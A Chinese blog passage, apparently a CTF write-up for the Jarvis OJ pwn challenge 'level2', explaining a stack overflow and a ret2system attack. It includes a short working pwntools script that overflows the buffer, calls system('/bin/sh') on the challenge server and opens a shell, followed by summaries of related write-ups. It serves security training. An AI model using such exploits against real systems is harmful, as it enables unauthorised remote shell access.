(Jarvis Oj)(Pwn) level2

最新推荐文章于 2024-06-23 01:01:15 发布
最新推荐文章于 2024-06-23 01:01:15 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_36788573/article/details/80004451
版权

(Jarvis Oj)(Pwn) level2

首先用checksec查一下保护。这次NX开启了。
这里写图片描述
用ida反汇编,找到溢出点。
这里写图片描述
这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者使用pwntools的elf工具)。
这里写图片描述
整个逻辑的示意图如下:
这里写图片描述
注意不能在vulnerable函数的返回地址后面直接跟参数,我们需要模拟call system函数的过程,在这个过程中call有一步是将下一条指令的地址压栈,所以我们需要构造一个假的返回地址,当然这个内容随意。写得脚本如下。 

  1 from pwn import *
  2 conn=remote("pwn2.jarvisoj.com","9878")
  3 e=ELF("./level2")
  4 sys_addr=e.symbols['system']
  5 pad=0x88
  6 sh_addr=e.search("/bin/sh").next()
  7 payload="A"*pad+"BBBB"+p32(sys_addr)+"dead"+p32(sh_addr    )
  8 conn.sendline(payload)
  9 conn.interactive();
不干正事的拖延症患者
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1411
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
Jarvis Oj Pwn 学习笔记-level2
baoan4763的博客
05-31 155
32位构造栈参数溢出! 恭敬地呈上链接: https://files.cnblogs.com/files/Magpie/level2.rar nc pwn2.jarvisoj.com 9878 首先....日常checksec: 程序扔进IDA锅里: 找到了溢出点~下面我们开始食用: 既然有调用system函数,肯定是可以直接call一波的,只是还缺一个参数,我...
jarvisoj_level2
最新发布
Nike_name的博客
06-23 349
栈溢出构造(函数)从而得到shell
Jarvis oj level2 wp
ditto的博客
12-30 1170
检查防护 开启了NX,没开启PIE和canary防护,程序本身的基址不变。 放IDA里看一下 程序本身调用了system函数,那么PLT表里就一定有这个函数。 看下vulner函数 很显然栈溢出。 IDA查找下字符串: 发现了/bin/sh字符串,而且在本身程序的data段,由于没有开启PIE,那么这个字符串的首地址是不会变的。 简单计算下,首地址是0x0804A024, 算下溢出点是多...
jarvisoj-level2
qq_35661990的博客
11-09 1374
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
jarvis音频.zip
07-31
"JARVIS_֪ͨ_1.m4r"可能是贾维斯的语音信息提示,"JARVIS_日历提醒_1.m4r"则能在日程提醒时带来钢铁侠团队的智能感,而"JARVIS_新信息_2.m4r"和"JARVIS_新语音信箱_1.m4r"则是针对新消息和语音留言的特别提示,让你...
Jarvis声音.zip
09-28
"Jarvis声音.zip"这个压缩包文件显然与流行的科幻角色——钢铁侠托尼·斯塔克的人工智能助手Jarvis有关。Jarvis,全名Just A Rather Very Intelligent System,是漫威宇宙中的一个标志性元素,其在电影中以其独特、...
JarvisOJ-PWN-Level2
杀生丸?不,其实我要的是桔梗
03-22 660
JarvisOJ-PWN-Level2 IDA打开,稍微分析下发现其和level1大致一样,都是利用read栈溢出。 shift+12查看字符串 看到/bin/sh 双击得到地址: 再看到这个: 那么就是要传参数到system()里了。 所以构造代码如下: # -*- coding:utf-8 -*- from pwn import * # sh = proce...
18.9.19 Jarvis OJ PWN----[XMAN]level2(x64)
qq_42192672的博客
09-19 291
先checksec一下 可以栈溢出,我们可以看到文件里有system函数,有/bin/sh字符串,美滋滋 64位函数的参数传递顺序和32位不同,传参顺序:rdi,rsi,rdx,rcx,r8,r9,栈,所以要把\bin\sh的地址放到rdi里 找一下可溢出的地方,在read函数里 关键点其实就是找出rdi地址(参考大佬的教学) 指令语句:ROPgadget --binary le...
Jarvis OJ [XMAN]level2
九层台
07-06 311
查询保护 liu@liu-F117-F:~/桌面/oj/level2$ checksec level2 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2/level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found...
jarvis oj level2–两种方式构造函数栈
超人学飞的日子
04-07 602
关于这个level2,在网上找到了两种解法,放在一起分析了一下。 首先查看题目基本信息: 程序开启了栈不可执行保护。 IDA查看反汇编代码: 可以看到存在栈溢出,并且程序调用了system函数。 所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/b...
18.9.18 Jarvis OJ PWN----[XMAN]level2
qq_42192672的博客
09-18 214
先检测文件 我们可以看到没有栈保护,可以利用栈溢出 拖进IDA 先是一个vulnerable_function函数,同时在函数列表中我们可以看到有system函数,我们可以把returnaddress牵引到system函数上,执行/bin/sh语句 buf的偏移量是0x88个字节,花0x04个字节覆盖ebp,然后伪造returnsddress跳转到system,再加上用来给syst...
笔记向——PWN jarvis oj level2
m0_52133692的博客
12-07 170
题目链接:https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1 nc pwn2.jarvisoj.com 9878 0x01分析漏洞 先查看文件类型,再运行一下文件 检查保护措施 补充: checksec :是用来检查可执行文件属性的。 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,lin
jarvis oj pwn
qq_44813849的博客
07-24 221
先附上一段大佬的总结,接着再说题。 栈溢出的基本套路: 找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接 构建shellcode,用一句话就行shellcode = asm(shellcraft.sh()) 构建payload,payload...
Jarvis OJ-PWN
weixin_45461609的博客
08-08 217
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值